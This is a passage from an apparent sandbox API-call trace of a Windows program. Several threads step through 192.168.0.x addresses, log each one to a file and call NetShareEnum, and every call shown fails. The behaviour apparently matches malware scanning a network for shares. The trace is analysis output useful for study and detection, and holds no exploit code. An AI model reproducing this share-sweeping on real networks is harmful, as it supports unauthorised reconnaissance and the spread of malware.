cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.448] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.448] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x645ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.448] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.448] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.448] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x645fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x645fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.453] NetShareEnum (in: servername="\\\\192.168.0.112", level=0x1, bufptr=0x645fedc, prefmaxlen=0xffffffff, entriesread=0x645fed4, totalentries=0x645fed0, resume_handle=0x645fecc | out: bufptr=0x645fedc, entriesread=0x645fed4, totalentries=0x645fed0, resume_handle=0x645fecc) returned 0x35 [0178.343] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.170", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.343] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.170", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.170", lpUsedDefaultChar=0x0) returned 15 [0178.343] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x645ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.343] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.343] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.343] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x645ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.343] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.343] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.343] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x645fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x645fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.347] NetShareEnum (in: servername="\\\\192.168.0.170", level=0x1, bufptr=0x645fedc, prefmaxlen=0xffffffff, entriesread=0x645fed4, totalentries=0x645fed0, resume_handle=0x645fecc | out: bufptr=0x645fedc, entriesread=0x645fed4, totalentries=0x645fed0, resume_handle=0x645fecc) returned 0x35 [0211.205] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.234", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.205] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.234", cchWideChar=15, lpMultiByteStr=0x1e830ec, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.234", lpUsedDefaultChar=0x0) returned 15 [0211.205] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x645fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x645fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x645ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.479] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.479] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x645ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.479] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.479] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.479] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x645fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x645fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.480] NetShareEnum (in: servername="\\\\192.168.0.234", level=0x1, bufptr=0x645fedc, prefmaxlen=0xffffffff, entriesread=0x645fed4, totalentries=0x645fed0, resume_handle=0x645fecc | out: bufptr=0x645fedc, entriesread=0x645fed4, totalentries=0x645fed0, resume_handle=0x645fecc) returned 0x35 [0258.010] SetEvent (hEvent=0x1dc) returned 1 [0258.010] RtlExitUserThread (Status=0x0) Thread: id = 74 os_tid = 0xcd4 [0089.082] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.53", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.082] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.53", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.53", lpUsedDefaultChar=0x0) returned 14 [0089.082] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x659ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0089.082] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.082] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0089.082] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x659ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0089.082] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.082] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0089.082] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x659fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x659fc54*=0x10, lpOverlapped=0x0) returned 1 [0089.086] NetShareEnum (in: servername="\\\\192.168.0.53", level=0x1, bufptr=0x659fedc, prefmaxlen=0xffffffff, entriesread=0x659fed4, totalentries=0x659fed0, resume_handle=0x659fecc | out: bufptr=0x659fedc, entriesread=0x659fed4, totalentries=0x659fed0, resume_handle=0x659fecc) returned 0x35 [0144.457] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.113", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.457] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.113", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.113", lpUsedDefaultChar=0x0) returned 15 [0144.458] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x659ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.458] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.458] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.458] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x659ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.458] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.458] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.458] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x659fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x659fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.462] NetShareEnum (in: servername="\\\\192.168.0.113", level=0x1, bufptr=0x659fedc, prefmaxlen=0xffffffff, entriesread=0x659fed4, totalentries=0x659fed0, resume_handle=0x659fecc | out: bufptr=0x659fedc, entriesread=0x659fed4, totalentries=0x659fed0, resume_handle=0x659fecc) returned 0x35 [0178.234] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.155", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.234] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.155", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.155", lpUsedDefaultChar=0x0) returned 15 [0178.234] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x659ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.234] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.234] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.234] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x659ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.234] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.234] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.234] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x659fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x659fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.238] NetShareEnum (in: servername="\\\\192.168.0.155", level=0x1, bufptr=0x659fedc, prefmaxlen=0xffffffff, entriesread=0x659fed4, totalentries=0x659fed0, resume_handle=0x659fecc | out: bufptr=0x659fedc, entriesread=0x659fed4, totalentries=0x659fed0, resume_handle=0x659fecc) returned 0x35 [0211.210] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.248", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.211] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.248", cchWideChar=15, lpMultiByteStr=0x1e832ac, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.248", lpUsedDefaultChar=0x0) returned 15 [0211.211] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x659fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x659fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x659ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.470] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.470] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x659ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.470] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.470] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.470] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x659fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x659fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.471] NetShareEnum (in: servername="\\\\192.168.0.248", level=0x1, bufptr=0x659fedc, prefmaxlen=0xffffffff, entriesread=0x659fed4, totalentries=0x659fed0, resume_handle=0x659fecc | out: bufptr=0x659fedc, entriesread=0x659fed4, totalentries=0x659fed0, resume_handle=0x659fecc) returned 0x35 [0258.003] SetEvent (hEvent=0x1dc) returned 1 [0258.003] RtlExitUserThread (Status=0x0) Thread: id = 75 os_tid = 0xcd8 [0089.173] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.59", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.173] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.59", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.59", lpUsedDefaultChar=0x0) returned 14 [0089.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x66dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0089.173] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.173] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0089.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x66dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0089.173] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.174] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0089.174] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x66dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x66dfc54*=0x10, lpOverlapped=0x0) returned 1 [0089.884] NetShareEnum (in: servername="\\\\192.168.0.59", level=0x1, bufptr=0x66dfedc, prefmaxlen=0xffffffff, entriesread=0x66dfed4, totalentries=0x66dfed0, resume_handle=0x66dfecc | out: bufptr=0x66dfedc, entriesread=0x66dfed4, totalentries=0x66dfed0, resume_handle=0x66dfecc) returned 0x35 [0144.902] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.128", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.902] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.128", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.128", lpUsedDefaultChar=0x0) returned 15 [0144.902] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x66dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.902] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.902] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.902] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x66dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.902] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.902] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.902] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x66dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x66dfc54*=0x11, lpOverlapped=0x0) returned 1 [0144.912] NetShareEnum (in: servername="\\\\192.168.0.128", level=0x1, bufptr=0x66dfedc, prefmaxlen=0xffffffff, entriesread=0x66dfed4, totalentries=0x66dfed0, resume_handle=0x66dfecc | out: bufptr=0x66dfedc, entriesread=0x66dfed4, totalentries=0x66dfed0, resume_handle=0x66dfecc) returned 0x35 [0178.111] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.138", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.111] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.138", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.138", lpUsedDefaultChar=0x0) returned 15 [0178.111] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x66dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.111] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.111] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.111] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x66dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.111] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.111] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.111] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x66dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x66dfc54*=0x11, lpOverlapped=0x0) returned 1 [0178.115] NetShareEnum (in: servername="\\\\192.168.0.138", level=0x1, bufptr=0x66dfedc, prefmaxlen=0xffffffff, entriesread=0x66dfed4, totalentries=0x66dfed0, resume_handle=0x66dfecc | out: bufptr=0x66dfedc, entriesread=0x66dfed4, totalentries=0x66dfed0, resume_handle=0x66dfecc) returned 0x35 [0211.215] SetEvent (hEvent=0x1dc) returned 1 [0211.215] RtlExitUserThread (Status=0x0) Thread: id = 76 os_tid = 0xcdc [0089.148] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.55", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 